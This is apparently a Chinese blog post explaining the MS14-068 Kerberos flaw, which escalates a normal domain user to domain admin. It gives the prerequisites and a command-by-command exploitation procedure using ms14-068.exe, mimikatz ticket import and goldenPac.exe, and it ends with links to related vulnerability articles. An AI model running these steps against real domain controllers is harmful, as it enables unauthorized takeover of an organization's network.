首页 > 其他分享 >ms14-068漏洞

ms14-068漏洞

时间:2023-06-11 22:23:18浏览次数:51  
标签:exe 漏洞 068 利用 ms14 普通用户

ms14-068漏洞

目录

一、ms14-068漏洞介绍

ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。

二、ms14-068漏洞利用条件

1、获取域普通用户的账号密码

2、获取域普通用户的sid

3、服务器未打KB3011780补丁

三、ms14-068漏洞利用步骤

1、查看域用户的SID

whoami /all

2、清除内存中的票据

klist purge

3、通过ms14-068.exe生成票据

ms14-068.exe -u 域用户@域名 -p 域用户密码 -s 域用户SID -d 域控

4、导入票据到内存

kerberos::ptc 票据名字

5、测试是否成功(注意是机器名不是IP)

dir \\dc.candada.com\c$

6、可配合计划任务、服务或者PsExec工具上线

四、利用goldenPac.exe工具

它是MS14-068+psexec的组合,因此使用起来非常放方便快捷,一条命令可拿到system权限。

利用:

goldenPac.exe 域名/域用户名:域用户明文密码@域控完整域名

条件:

1、获取域普通用户的账号密码

2、获取域普通用户的sid

3、服务器未打KB3011780补丁

4、需要远程桌面(使用这个工具,运行了一条命令后,如果成功则会拿到一共反弹shell,CS没法用)

标签:exe,漏洞,068,利用,ms14,普通用户
From: https://www.cnblogs.com/candada/p/17473739.html

相关文章

  • 常见漏洞简介 防御建议
    BurtForce(暴力破解漏洞)概述:连续性尝试+字典+自动化(攻击者在不知道目标账号和密码的情况下进行尝试性的登录,在这个尝试的过程中,会使用一些自动化的工具和一个特定的字典,比如一个账号密码库,实现一个高效的自动化的连续的尝试性登录,从而得到一些有效的账户和密码)字典:一个有效的......
  • WEB漏洞—文件上传之黑白名单绕过
    文件上传常见验证---后缀名,类型,文件头等1. 后缀名:黑名单,白名单后缀名是直接的验证,分为黑名单(asp,php,jsp,aspx,cgi,war…)和白名单(jpg,png,zip,rar,gif…)。黑名单是不允许那些格式的文件上传,缺陷:添加文件的后缀,如PHP5等;白名单是只允许那些格式的文件上传,其余文件则不允许上传......
  • 五次Shift漏洞
    引子-破解win7密码在学校安排的网络空间安全实训过程中,了解到破解windows密码的相关原理,由于win10会导致个人信息泄露,所以目前的公司依然绝大多数使用的系统为win7系统。 背景-虚拟环境本次破解windows7密码攻击在虚拟机环境中实现 版本:VMwareV12.0版本Windowsserver2007原理......
  • 记一次ms15_034漏洞
    Fofa搜索后台登录的时候发现的一个网站,放进AWVS里扫一下但没搞懂漏洞具体怎么利用,一顿搜索后得知是ms15_034漏洞,并且在msf里有利用模块 so,msf启动! 搜索到两个模块,第一个是dos攻击的,百度了一下好像是能够直接让有此漏洞的机器蓝屏死机....dos攻击事儿咱可不干第二个模块......
  • 运行漏洞检测jar包提示找不到主类
    1.问题描述1.1报错信息#java-jarshiro_4.5.6-SNAPSHOT-all.jarPickedup_JAVA_OPTIONS:-Dawt.useSystemAAFontSettings=on-Dswing.aatext=trueError:Couldnotfindorloadmainclasscom.summersec.attack.UI.MainCausedby:java.lang.NoClassDef......
  • 应用层漏洞
    应用层漏洞暴力破解CSRFXSS全自动检测工具AWVSBurpsuiteBrutexssr扫描脚本知道原理,怎么利用就行;XSS绕过......
  • web基础漏洞-sql注入
    1、介绍sql注入,是用户提交的数据,服务端接收后未经过严格检查,将其直接拼接到sql语句中,交给sql应用执行,超出了开发者预期的sql语句结构,从而造成危害。2、详解(1)从数据来说,任何前端提交的数据,都有可能成为sql注入的参数。包括get、post、及其它请求方法,包括url、请求头部和请求体......
  • BT最新版一处RCE&后门&登录漏洞
    审计搞了宝塔好几个版本,花了也不算短时间,屯了3个洞1.一个命令执行(有一定利用条件,最开始不能回显,配合DNSLOG完成回显)2.一个不死后门(非官方,自留后门,用来持续维持权限)适用Linux/windows 测试版本:linux7.9.8Windows6.7.0Windows.7......
  • Nacos集群Raft反序列化漏洞-修复
    近日,奇安信CERT监测到 Nacos集群Raft反序列化漏洞(QVD-2023-13065),在Nacos集群处理部分Jraft请求时,攻击者可以无限制使用hessian进行反序列化利用,最终实现代码执行。鉴于该漏洞仅影响集群间通信端口7848(默认配置下),若部署时已进行限制或未暴露则风险可控,建议客户做好自查及防护......
  • JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
    JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)详细描述据NVD描述:在大于或等于1.2且在3.5.0之前的jQuery版本中,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。受影响版本大于等于1.2,小于......